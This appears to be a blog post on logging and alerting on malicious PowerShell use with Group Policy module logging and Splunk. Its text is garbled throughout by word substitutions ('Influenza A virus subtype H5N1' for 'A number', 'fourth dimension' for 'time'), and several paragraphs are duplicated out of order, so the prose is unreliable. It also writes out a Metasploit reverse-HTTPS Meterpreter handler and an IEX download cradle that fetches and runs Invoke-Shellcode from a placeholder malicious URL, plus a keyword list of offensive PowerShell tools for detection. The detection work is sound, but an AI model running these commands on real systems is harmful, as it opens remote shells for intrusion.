For the past times piddling piece I accept been spending fourth dimension learning most PowerShell together with how it tin live on used equally a subtle threat vector inside your network. Influenza A virus subtype H5N1 position out of PowerShell exploitation frameworks accept popped upward late including PowerSploit and Empire, which Greg covered inwards length dorsum inwards September. I, however, wanted to pass some fourth dimension to demonstrate how subtle together with insidious PowerShell tin live on when used equally a threat medium.
As mentioned inwards an before post, according to Verizon's 2013 Data Breach Report 76% of breaches involved stolen or weak credentials, so, to start, this transportation service volition assume that you lot accept already been exploited together with the assailant potentially has admin or domain admin credentials to focus on PowerShell equally a threat vector.
Influenza A virus subtype H5N1 huge give thank you lot you to the operate done past times Ryan Kazanciyan together with Matt Hastings for their research on PowerShell attacks, which was the starting betoken together with principal resources for query on this topic.
Leaving basically iii events to acquire by:
This is a good known limitation inwards PowerShell 2.0; however, the challenge is that most environments run operating systems that accept PowerShell 2.0 installed past times default default leaving organizations who don't occupation PowerShell having piddling argue to upgrade. This also leaves an active hole inwards an organization's safety posture towards potential threat vectors. You can't empathize what is happening if your scheme won't say you.
PowerShell 3.0 comes amongst many improvements including improved logging, then running the higher upward ascendance on a machine amongst PowerShell 3.0 volition give you lot the same iii events inwards Windows PowerShell, but it volition also give you lot a position out of novel events inwards both Windows-PowerShell/Operational and Windows-WinRM/Operational.
This is better--we are able to run into that the powershell console was manually started together with that the WinRM service was used inwards some capacity; but in that place is no noesis of what scripts or commands were run or what the results of said commands were. On a side note, piece running Invoke-ShellCode I mistyped the URL together with received an trial log 4100 amongst the fault message "No connectedness could live on made because the target machine actively refused." More on that later, but for at 1 time the overall lack of usable events is frightening together with cannot stand.
The Windows PowerShell department volition listing the Turn on Module Logging section:
Select Enabled together with click the Modules Names: Show button:
From in that place add together the lines "Microsoft.PowerShell.*" together with "Microsoft.WSMan.Management":
It worked! We tin run into the commands that were executed. It worked... To well. We run into approximately 300 events--one trial for each ascendance executed inwards the Invoke-Shellcode script. Well this is quite troubling. You are going to postulate a SIEM to procedure this type of volume, which nosotros volition occupation Splunk for this scenario.
As mentioned inwards an before post, according to Verizon's 2013 Data Breach Report 76% of breaches involved stolen or weak credentials, so, to start, this transportation service volition assume that you lot accept already been exploited together with the assailant potentially has admin or domain admin credentials to focus on PowerShell equally a threat vector.
Influenza A virus subtype H5N1 huge give thank you lot you to the operate done past times Ryan Kazanciyan together with Matt Hastings for their research on PowerShell attacks, which was the starting betoken together with principal resources for query on this topic.
Downloading together with Connecting to Metasploit
Once an histrion gains access to a random Windows server inside your surround the showtime activity they volition typically perform is to escalate privileges. PowerSploit has a nifty PowerShell module called Invoke-ShellCode that tin invoke shellcode into a running procedure or fifty-fifty PowerShell itself. So for example, you lot tin laid upward a Kali Linux server amongst a Metasploit server listening on port 443 for incoming shellcode commands:Metasploit: msf > use exploit/multi/handler msf exploit(handler) > laid PAYLOAD windows/meterpreter/reverse_https msf exploit(handler) > laid LHOST <Your local host> msf exploit(handler) > set LPORT 443 msf exploit(handler) > exploit
Then you lot tin run the next commands to download together with run the PowerShell Invoke-Shellcode script (default Invoke--Shellcode inwards the Git repositories. That was a wasted hateful solar daytime together with a half.) This volition exercise an HTTPS connectedness dorsum to a C&C Meterpreter shell, or worse:PowerShell: IEX (New-Object Net.WebClient).DownloadString("https://<Malicious URL>/Invoke-Shellcode.ps1") Invoke-ShellCode -Payload windows/meterpreter/reverse_https -Lhost <malicious IP> -Lport 443 -Force
Event Logging
Because both the download together with ShellCode connections are via HTTPS most perimeter IPS/AntiVirus volition non inspect them. The ShellCode runs inwards retention together with doesn't striking the disk, leaving it real hard to give away past times both Antiviruses together with classic forensics, but the of import affair to focus on hither is how PowerShell logs these events piece hunting. Executing the higher upward on a Windows 2008 R2 OS amongst PowerShell 2.0 generates alone iii relevant events inwards the Windows PowerShell trial log: The Windows PowerShell Event Log After Executing ShellCode inwards PowerShell
Leaving basically iii events to acquire by:
400 | Engine field is changed from None to Available. |
403 | Engine field is changed from Available to Stopped. |
600 | Provider "Certificate" is Started. |
WinEventLog:Windows PowerShell
There is null inwards the trial logs most running a script that invokes a ShellCode backdoor to my malicious C&C domain. Can you lot believe Windows Event Logs? Ridiculous. But safety wise this is a serious trouble concern since in that place is no indication of what commands or scripts were run, past times whom, or what actions the scheme took. Running similar scripts such equally Invoke-Mimikatz also produces roughly the same events from inside a PowerShell context.This is a good known limitation inwards PowerShell 2.0; however, the challenge is that most environments run operating systems that accept PowerShell 2.0 installed past times default default leaving organizations who don't occupation PowerShell having piddling argue to upgrade. This also leaves an active hole inwards an organization's safety posture towards potential threat vectors. You can't empathize what is happening if your scheme won't say you.
PowerShell 3.0 comes amongst many improvements including improved logging, then running the higher upward ascendance on a machine amongst PowerShell 3.0 volition give you lot the same iii events inwards Windows PowerShell, but it volition also give you lot a position out of novel events inwards both Windows-PowerShell/Operational and Windows-WinRM/Operational.
403 | PowerShell Console Startup |
40961 | Engine field is changed from None to Available. |
40962 | PowerShell console is ready for user input |
Microsoft-Windows-PowerShell/Operational
208 | The Winrm service is starting |
209 | The Winrm service started successfully |
211 | The Winrm service is stopping |
212 | The Winrm service was stopped successfully |
Microsoft-Windows-WinRM/Operational
This is better--we are able to run into that the powershell console was manually started together with that the WinRM service was used inwards some capacity; but in that place is no noesis of what scripts or commands were run or what the results of said commands were. On a side note, piece running Invoke-ShellCode I mistyped the URL together with received an trial log 4100 amongst the fault message "No connectedness could live on made because the target machine actively refused." More on that later, but for at 1 time the overall lack of usable events is frightening together with cannot stand.
PowerShell Module Logging
One selection is to add together logging options to the global PowerShell profile; however, profiles tin live on easily bypassed past times adding the "-NoProfile" flag to your commands. The best option, however, is to enable PowerShell Module Logging inwards your GPO [Edit: PowerShell 3.0+ is required on the system.] To exercise then acquire to to your Group Policy Editor -> Computer Configuration -> Policies -> Administrative Templates -> Windows Components -> Windows PowerShell: GPO Windows PowerShell Module Logging Location
Windows PowerShell Module Logging Modules
Windows PowerShell Module Logging Properties
Module Logging for PowerShell together with WSMan
Now, let's endeavor the remote shellcode connectedness again: Windows Event Log amongst Module Logging
Setting upward Splunk for PowerShell Events
To input PowerShell events into Splunk, exercise a input.conf amongst the next stanzas:[WinEventLog://Windows PowerShell] disabled = faux index = wineventlog
These stanzas volition read events from the Windows PowerShell trial logs, which is where the PowerShell commands are saved. Alternative Windows Events that you lot tin salve for skillful posture are PowerShell Operational, PowerShell Analytic together with WinRM Operational trial logs. Use the next Stanza for each:
[WinEventLog://Microsoft-Windows-PowerShell/Operational] disabled = faux index = wineventlog [WinEventLog://Microsoft-Windows-PowerShell/Analytic] disabled = faux index = wineventlog [WinEventLog://Microsoft-Windows-WinRM/Operational] disabled = faux index = wineventlog
So at 1 time that nosotros accept our events into Splunk nosotros postulate a agency to search for malicious events. First, what is a malicious trial inwards PowerShell? I similar to expect for keywords used inwards gfoss' PowerShell Command Line Logging list:
Depending on your surround you lot may postulate to play amongst the scenarios that you lot warning on, such equally if your administrators are heavy PowerShell users you lot may desire to whitelist your administrators until off hours/non-change window periods. I would also monitor for the ascendance "Enable-PSRemoting" since this ascendance enables the might to remotely execute PowerShell commands on a local machine. Only administrators amongst a occupation should enable this feature.
Finally, depending on if your surround doesn't occupation PowerShell you lot tin expect for interactive PowerShell commands (or mayhap but during off hours/non-change windows) such equally "Invoke-Command" and "Enter-PSSession".
- Set-ExecutionPolicy
- Mimikatz
- EncodedCommand
- Payload
- Find-AVSignature
- DllInjection
- ReflectivePEInjection
- Invoke-Shellcode
- Invoke--Shellcode
- Invoke-ShellcodeMSIL
- Get-GPPPassword
- Get-Keystrokes
- Get-TimedScreenshot
- Get-VaultCredential
- Invoke-CredentialInjection
- Invoke-NinjaCopy
- Invoke-TokenManipulation
- Out-Minidump
- Set-MasterBootRecord
- New-ElevatedPersistenceOption
- Invoke-CallbackIEX
- Invoke-PSInject
- Invoke-DllEncode
- Get-ServiceUnquoted
- Get-ServiceEXEPerms
- Get-ServicePerms
- Invoke-ServiceUserAdd
- Invoke-ServiceCMD
- Write-UserAddServiceBinary
- Write-CMDServiceBinary
- Write-UserAddMSI
- Write-ServiceEXE
- Write-ServiceEXECMD
- Restore-ServiceEXE
- Invoke-ServiceStart
- Invoke-ServiceStop
- Invoke-ServiceEnable
- Invoke-ServiceDisable
- Invoke-FindDLLHijack
- Invoke-FindPathHijack
- Get-RegAlwaysInstallElevated
- Get-RegAutoLogon
- Get-UnattendedInstallFiles
- Get-Webconfig
- Get-ApplicationHost
- Invoke-AllChecks
- Invoke-MassCommand
- Invoke-MassMimikatz
- Invoke-MassSearch
- Invoke-MassTemplate
- Invoke-MassTokens
- HTTP-Backdoor
- Add-ScrnSaveBackdoor
- Gupt-Backdoor
- Invoke-ADSBackdoor
- Execute-OnTime
- DNS_TXT_Pwnage
- Out-Word
- Out-Excel
- Out-Java
- Out-Shortcut
- Out-CHM
- Out-HTA
- Enable-DuplicateToken
- Remove-Update
- Execute-DNSTXT-Code
- Download-Execute-PS
- Execute-Command-MSSQL
- Download_Execute
- Get-PassHashes
- Invoke-CredentialsPhish
- Get-LsaSecret
- Get-Information
- Invoke-MimikatzWDigestDowngrade
- Copy-VSS
- Check-VM
- Invoke-NetworkRelay
- Create-MultipleSessions
- Run-EXEonRemote
- Invoke-BruteForce
- Port-Scan
- Invoke-PowerShellIcmp
- Invoke-PowerShellUdp
- Invoke-PsGcatAgent
- Invoke-PoshRatHttps
- Invoke-PowerShellTcp
- Invoke-PoshRatHttp
- Invoke-PowerShellWmi
- Invoke-PSGcat
- Remove-PoshRat
- TexttoEXE
- Invoke-Encode
- Invoke-Decode
- Base64ToString
- StringtoBase64
- Do-Exfiltration
- Parse_Keys
- Add-Exfiltration
- Add-Persistence
- Remove-Persistence
- Invoke-CreateCertificate
- powercat
- Find-PSServiceAccounts
- Get-PSADForestKRBTGTInfo
- Discover-PSMSSQLServers
- Discover-PSMSExchangeServers
- Get-PSADForestInfo
- Get-KerberosPolicy
- Discover-PSInterestingServices
index=wineventlog sourcetype="WinEventLog:Windows PowerShell" [|inputlookup BadPowerShellCommands.csv| rename BadPowerShellCommand equally search | format]
This volition filter your PowerShell consequence laid amongst anything containing a malicious command. Next, inwards the search page, click the Save As push together with salve equally Alert: Splunk Search amongst Save selection for creating an Alert
Opens the Alert Creation window:
Alert creation screen
Depending on your surround you lot may postulate to play amongst the scenarios that you lot warning on, such equally if your administrators are heavy PowerShell users you lot may desire to whitelist your administrators until off hours/non-change window periods. I would also monitor for the ascendance "Enable-PSRemoting" since this ascendance enables the might to remotely execute PowerShell commands on a local machine. Only administrators amongst a occupation should enable this feature.
Finally, depending on if your surround doesn't occupation PowerShell you lot tin expect for interactive PowerShell commands (or mayhap but during off hours/non-change windows) such equally "Invoke-Command" and "Enter-PSSession".